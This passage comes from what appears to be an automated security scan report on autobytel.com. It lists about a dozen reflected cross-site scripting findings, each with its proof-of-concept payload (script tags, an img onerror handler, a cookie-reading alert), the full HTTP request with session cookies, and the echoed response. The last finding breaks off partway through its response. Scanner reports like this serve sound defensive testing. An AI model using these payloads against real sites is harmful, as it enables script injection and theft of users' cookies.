<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<link rel="canonical" href="http://www.autobytel.com/content/home/help/index.cfm/action/about?1a165"><script>alert(1)</script>04f69bcc06f=1">
...[SNIP]...

4.491. http://www.autobytel.com/content/home/help/index.cfm/action/contact [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/home/help/index.cfm/action/contact

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e53c1"><script>alert(1)</script>1096707d8b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/home/help/index.cfm/action/contact?e53c1"><script>alert(1)</script>1096707d8b0=1 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 36652
Expires: Mon, 24 Jan 2011 23:36:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:36:34 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:36:34 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:36:34 GMT;path=/
Set-Cookie: PV_CT=3;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<link rel="canonical" href="http://www.autobytel.com/content/home/help/index.cfm/action/contact?e53c1"><script>alert(1)</script>1096707d8b0=1">
...[SNIP]...

4.492. http://www.autobytel.com/content/home/help/index.cfm/action/privacy [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/home/help/index.cfm/action/privacy

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7baa5"><script>alert(1)</script>7e39fdfacf3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/home/help/index.cfm/action/privacy?7baa5"><script>alert(1)</script>7e39fdfacf3=1 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:52:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:52:42 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:52:41 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:52:41 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 55363


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<link rel="canonical" href="http://www.autobytel.com/content/home/help/index.cfm/action/privacy?7baa5"><script>alert(1)</script>7e39fdfacf3=1">
...[SNIP]...

4.493. http://www.autobytel.com/content/home/help/index.cfm/action/terms [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/home/help/index.cfm/action/terms

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c24ec"><script>alert(1)</script>ea08fbb8c3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/home/help/index.cfm/action/terms?c24ec"><script>alert(1)</script>ea08fbb8c3=1 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:40:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:40:49 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:40:48 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:40:48 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 54715


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<link rel="canonical" href="http://www.autobytel.com/content/home/help/index.cfm/action/terms?c24ec"><script>alert(1)</script>ea08fbb8c3=1">
...[SNIP]...

4.494. http://www.autobytel.com/content/research/Reviews/index.cfm/action/addCtdStep1/reviewDo/Read/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/research/Reviews/index.cfm/action/addCtdStep1/reviewDo/Read/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79131"><script>alert(1)</script>c16027f265e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/research/Reviews/index.cfm/action/addCtdStep1/reviewDo/Read/?79131"><script>alert(1)</script>c16027f265e=1 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Tue, 25 Jan 2011 00:35:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 25 Jan 2011 00:35:29 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Thu, 17-Jan-2041 00:35:29 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Thu, 17-Jan-2041 00:35:29 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 75109


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<link rel="canonical" href="http://www.autobytel.com/content/research/Reviews/index.cfm/action/addCtdStep1/reviewDo/Read/?79131"><script>alert(1)</script>c16027f265e=1">
...[SNIP]...

4.495. http://www.autobytel.com/content/research/article/index.cfm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/research/article/index.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e083"><script>alert(1)</script>3970073240c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/research/article/index.cfm?9e083"><script>alert(1)</script>3970073240c=1 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:38:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:38:22 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:38:22 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:38:22 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 42796


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<link rel="canonical" href="http://www.autobytel.com/content/research/article/index.cfm?9e083"><script>alert(1)</script>3970073240c=1">
...[SNIP]...

4.496. http://www.autobytel.com/content/research/article/index.cfm/filters/Auto%20Show [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/research/article/index.cfm/filters/Auto%20Show

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47d69"><script>alert(1)</script>361724af196 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/research/article/index.cfm/filters/Auto%20Show?47d69"><script>alert(1)</script>361724af196=1 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:33:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:33:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:33:25 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:33:25 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 53105


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<link rel="canonical" href="http://www.autobytel.com/content/research/article/index.cfm/filters/Auto Show?47d69"><script>alert(1)</script>361724af196=1">
...[SNIP]...

4.497. http://www.autobytel.com/content/research/article/index.cfm/filters/Buying%20Guide [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/research/article/index.cfm/filters/Buying%20Guide

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a483e"><script>alert(1)</script>844843e9554 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/research/article/index.cfm/filters/Buying%20Guide?a483e"><script>alert(1)</script>844843e9554=1 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 45634
Expires: Mon, 24 Jan 2011 23:37:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:37:00 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:36:59 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:36:59 GMT;path=/
Set-Cookie: PV_CT=3;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<link rel="canonical" href="http://www.autobytel.com/content/research/article/index.cfm/filters/Buying Guide?a483e"><script>alert(1)</script>844843e9554=1">
...[SNIP]...

4.498. http://www.autobytel.com/content/research/comparison/index.cfm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/research/comparison/index.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 851b3"><script>alert(1)</script>1b23e4debab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/research/comparison/index.cfm?851b3"><script>alert(1)</script>1b23e4debab=1 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:56:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:56:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:56:33 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:56:33 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 414182


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<link rel="canonical" href="http://www.autobytel.com/content/research/comparison/index.cfm?851b3"><script>alert(1)</script>1b23e4debab=1">
...[SNIP]...

4.499. http://www.autobytel.com/content/research/kbb/index.cfm/action/selectyear/valuetype/TI [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/research/kbb/index.cfm/action/selectyear/valuetype/TI

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5e80"><script>alert(1)</script>9fb9c2eb029 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/research/kbb/index.cfm/action/selectyear/valuetype/TI?f5e80"><script>alert(1)</script>9fb9c2eb029=1 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:35:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:35:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:35:15 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:35:15 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 37535


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<link rel="canonical" href="http://www.autobytel.com/content/research/kbb/index.cfm/action/selectyear/valuetype/TI?f5e80"><script>alert(1)</script>9fb9c2eb029=1">
...[SNIP]...

4.500. http://www.autobytel.com/content/research/top10/index.cfm/action/top10/vehicleclass/all/listtype/1 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/research/top10/index.cfm/action/top10/vehicleclass/all/listtype/1

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4ccd"><script>alert(1)</script>16170de7a7b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/research/top10/index.cfm/action/top10/vehicleclass/all/listtype/1?f4ccd"><script>alert(1)</script>16170de7a7b=1 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:27:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:27:13 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:27:12 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:27:12 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 34734


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<link rel="canonical" href="http://www.autobytel.com/content/research/top10/index.cfm/action/top10/vehicleclass/all/listtype/1?f4ccd"><script>alert(1)</script>16170de7a7b=1">
...[SNIP]...

4.501. http://www.autobytel.com/content/shared/modProfile/index.cfm [action parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/shared/modProfile/index.cfm

Issue detail

The value of the action request parameter is copied into the HTML document as plain text between tags. The payload 1d65d<img%20src%3da%20onerror%3dalert(1)>413a205e61a was submitted in the action parameter. This input was echoed as 1d65d<img src=a onerror=alert(1)>413a205e61a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /content/shared/modProfile/index.cfm?id=4;ABTL&action=handler1d65d<img%20src%3da%20onerror%3dalert(1)>413a205e61a HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
server-error: true
Content-Length: 10174
Vary: Accept-Encoding
Expires: Mon, 24 Jan 2011 23:44:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
